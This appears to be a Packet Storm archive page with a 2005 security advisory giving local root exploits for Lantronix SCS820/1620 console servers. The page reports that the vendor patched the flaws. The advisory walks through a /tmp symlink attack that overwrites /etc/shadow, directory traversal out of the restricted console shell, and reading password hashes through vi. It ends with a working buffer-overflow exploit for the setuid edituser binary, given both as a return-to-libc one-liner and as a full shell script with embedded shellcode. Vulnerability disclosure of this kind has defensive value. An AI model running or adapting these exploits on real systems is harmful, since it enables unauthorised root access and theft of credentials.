exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

lantronixRoot.txt

lantronixRoot.txt
Posted Aug 6, 2005
Authored by c0ntex

Multiple Lantronix Secure Console Server local root exploits that make use of security issues allowing for unrestricted shell access.

tags | exploit, shell, local, root
SHA-256 | c0a5ce471897d527b519e28394d96c4425c7cba31436744d12e76f3ba35bd3c2

lantronixRoot.txt

Change Mirror Download
 /*
*****************************************************************************************************************
$ An open security advisory #11 - Lantronix SCS Local Root Exploits
*****************************************************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com || c0ntex[@]open-security.org
2: Bug Released: August 05 2005
3: Bug Impact Rate: Hi
4: Bug Scope Rate: Local
*****************************************************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************************************************

SCS820/1620 - Lantronix Secure Console Server
http://www.lantronix.com

"The SCS820 and SCS1620 are members of the ActiveLinx family of secure console servers (SCS).
With ActiveLinx secure console servers, system administrators can tackle local and remote IT
incidents in record time. IT professionals gain key business advantages such as reduced time
attending problems and lowered total cost of ownership for equipment and maintenance. Secure
console servers provide a significant return on investment with faster problem solving
capabilities and higher uptime."


Multiple security issues with Lantronix Secure Console Server mean that it is trivial for a
user to become root and cause trouble on the system by abusing buffer overflows and insecure
file system configurations.


1) Insecure /tmp and pipe permissions.
2) Directory traversal allowing local users unauthorised access to underlying Linux OS.
3) Sysadmin gains local root by abusing the fact that ci does not drop root privileges.
4) All users local root via edituser using return-to-libc and generic stack smash.


Lantronix have released a fix for these issues in their latest patch, Firmware v4.4


Example 1: Overwrite root owned files
----------
[c0ntex@SCS1620 /tmp]$ ls -al
total 2
drwxrwxrwx 2 root root 1024 Oct 31 00:50 ./
drwxr-xr-x 16 root root 1024 Oct 20 11:38 ../
prw-rw-rw- 1 root root 0 Oct 31 00:14 listen_fifo_server|


[c0ntex@SCS1620 /tmp]$ mv listen_fifo_server listen_fifo_server.orig
[c0ntex@SCS1620 /tmp]$ ln -s /etc/shadow listen_fifo_server

Now user waits for system administrator to log in and do some work on the console:

sysadmin>listen 01
Please wait for connection..
sysadmin-DEVICE_01>logout

[sysadmin@SCS1620 /tmp]$ su - root
Password:
su: incorrect password # odd......

From another window:
[root@SCS1620 /tmp]# head /etc/shadow
j /tmp/listen_fifo_5226;DEVICE_0121:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
adm:*:11529:0:99999:7:::


Example 2: Directory traversal to gain access to underlying system
----------
c0ntex>?
Commands:
alias - List command aliases
cat - Print history buffer
clear - Clear port buffer
connections - show active connections
...
c0ntex>/bin/bash
/bin/bash: unknown command
c0ntex>
c0ntex>
c0ntex>../../../bin/bash
[c0ntex@SCS1620 /var/tmp]$


Example 3: Sysadmin becomes root
----------
sysadmin>
sysadmin>
sysadmin>bash
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ cat /etc/shadow
cat: /etc/shadow: Permission denied
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ exit
sysadmin>../../../bin/cat /etc/shadow
root:$1$kjhfiusdhf9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
sysadmin>../../../bin/vi
~
~
~
~
~
:!cat /etc/shadow
root:$1$kjhsfsdfsdff9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
~
~
~
~
~
:q!


Run bash from the ci interface as sysadmin and from strace, we get the following:

sysadmin>bash
...
14441 [400d8367] getuid() = 500
14441 [400f775b] setresuid(ruid 4294967295, euid 500, suid 4294967295) = 0

and via directory traversal:

sysadmin> ../../../bin/bash
...
14392 [400ab367] getuid() = 500
14392 [400ab3c7] getgid() = 100
14392 [400ab397] geteuid() = 0
14392 [400ab3f7] getegid() = 100
...

sysadmin>../../../home/sysadmin/snakeoil 10719

Attached process [10719] OK!
++ Stack regsiters for PID of [10719] ++
Stack Address of %eax = [0xfffffe00]
Stack Address of %ecx = [0xbffff100]
Stack Address of %edx = [0x00000000]
Stack Address of %ebx = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of %ebp = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of %edi = [0xffffffff]
Stack Address of %eip = [0x400d79a9]

Injecting %eip register with [0xbffff2bb]

++ Stack regsiters for PID of [10719] ++
Stack Address of %eax = [0xfffffe00]
Stack Address of %ecx = [0xbffff100]
Stack Address of %edx = [0x00000000]
Stack Address of %ebx = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of %ebp = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of %edi = [0xffffffff]
Stack Address of %eip = [0xbffff2bb]
Detached process [10719] OK!

bash#


Example 4: Become root - Buffer overflow in edituser binary

The edituser binary is used to edit a users configuration parameters found in UserName.conf.
It lets you set escape sequences, server permissions and other basic user permissions and
features of the Secure Console Server.

During exploitation, edituser will strip \xff from the input, so you have to use a retaddr
that does not have the standard 0xbfff1234 type address. By creating a large pad environment
variable before running the test you can nudge your shellcode to a nice location, such as
0xbffe1234, which lets us get round this trivial obstacle. The return-to-libc method also
needs the stack nudge since the address for "/bin/sh" is stored in the environment.

[sysadmin@SCS1620 /usr/local/bin]$ ls -al edituser
-rwsr-xr-x 1 root root 12912 Apr 15 2003 edituser
[sysadmin@SCS1620 /usr/local/bin]$ su - c0ntex
Password:
bash$ cp `which edituser` . && gdb -q ./edituser
no debugging symbols found)...gdb>
gdb>
gdb>r -b `perl -e 'printf "\x41" x 70'`
escape sequence is too long.
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
_______________________________________________________________________________
eax:00000000 ebx:00000004 ecx:4001A94B edx:4010B140 eflags:00010246
esi:0804BC0C edi:00000000 esp:BFFEC748 ebp:41414141 eip:41414141
cs:0023 ds:002B es:002B fs:0000 gs:0000 ss:002B o d I t s Z a P c
[002B:BFFEC748]---------------------------------------------------------[stack]
BFFEC778 : 28 D6 04 08 6C C9 10 40 - 70 A8 00 40 94 F8 FE BF (...l..@p..@....
BFFEC768 : 8C 9B 04 08 01 00 00 00 - 60 BC 04 08 08 BC 04 08 ........`.......
BFFEC758 : BC BC 04 08 F0 C7 FE BF - 01 00 00 00 48 F8 FE BF ............H...
BFFEC748 : 41 41 41 41 41 41 41 41 - 41 41 00 08 FF FF FF FF AAAAAAAAAA......
[002B:0804BC0C]---------------------------------------------------------[ data]
0804BC0C : 39 BA 01 40 2C BA 01 40 - 1E BA 01 40 10 BA 01 40 9..@,..@...@...@
0804BC1C : 00 00 00 00 00 00 00 00 - 03 00 00 00 00 00 00 00 ................
[0023:41414141]---------------------------------------------------------[ code]
0x41414141: Error while running hook_stop:
Error while running hook_stop:
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb> q


//return-to-libc version for non-exec-stack systems

[c0ntex@SCS1620 ~]$ id -a
uid=501(c0ntex) gid=501(c0ntex) groups=501(c0ntex)
[c0ntex@SCS1620 ~]$ export STACKPAD=`perl -e 'print "A" x 65000'`
[c0ntex@SCS1620 /home/c0ntex]$ edituser -e `perl -e 'print "A" x 56'``printf "\x70\xe6\x05\x40\x70\xe6\x05\x40\x81\xfd\xfe\xbf"`
escape sequence is too long.
bash: /bin/bash/.bashrc: Not a directory
bash#


//general stack-smash version for older boxes

#!/bin/sh
# Lantronix Secure Console Server edituser root exploit by
# c0ntex - c0ntexb@gmail.com | c0ntex@open-security.org
# Advisory @ http://www.open-security.org/advisories/11
#
# The Linux system supplied by Lantronix does not have gnu
# C compiler, so the exploit is provided as a shell script
# as such, you might need to change the address for
#
#[c0ntex@SCS1620 ~/exploit]$ sh edituserxp.sh
#
# **** *** *** *** *** *** *** *** ***
#[-] Local root exploit for edituser using return-to-libc
#[-] discovered and written by c0ntex | c0ntexb@gmail.com
#Expect a root shell :-) -> escape sequence is too long.
#bash# id -a
#uid=0(root) gid=0(root) groups=100(users),0(root),200(admin)
#bash#
#
BUFFPAD="OPEN-SECURITY.ORG**OPEN-SECURITY.ORG**OPEN-SECURITY.ORG!"
NOPSLED=`perl -e 'print "\x41" x 1000'`
RETADDR=`printf "\x74\xc2\xfe\xbf"`
SETUID=`printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80"`
SHELL=`printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"`
STACKPAD=`perl -e 'print "A" x 65000'`
VULNAP=/usr/local/bin/edituser
VULNOP="-e"

export BUFFPAD NOPSLED RETADDR SETUID SHELL STACKPAD VULNAP VULNOP

printf "\n **** *** *** *** *** *** *** *** ***\n"
printf "[-] Local root exploit for edituser\n"
printf "[-] discovered and written by c0ntex\n"

if [ -f $VULNAPP ] ; then
printf "Expect a root shell :-) -> "; sleep 1
$VULNAP $VULNOP $BUFFPAD$RETADDR$NOPSLED$SETUID$SHELL
success=$?
if [ $success -gt 0 ] ; then
printf "\nSeems something messed up, changing NOPBUF to 10000 and trying again!\n"
sleep 2
unset NOPSLED
NOPSLED=`perl -e 'print "\x41" x 10000'`
printf "Expect a root shell :-) -> "
$VULNAP $VULNOP $BUFFPAD$RETADDR$NOPSLED$SETUID$SHELL
success=$?
if [ $success -gt 0 ] ; then
printf "\nAgain it failed, sorry you are on your own now :(\n"
fi
fi
fi

EOF
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close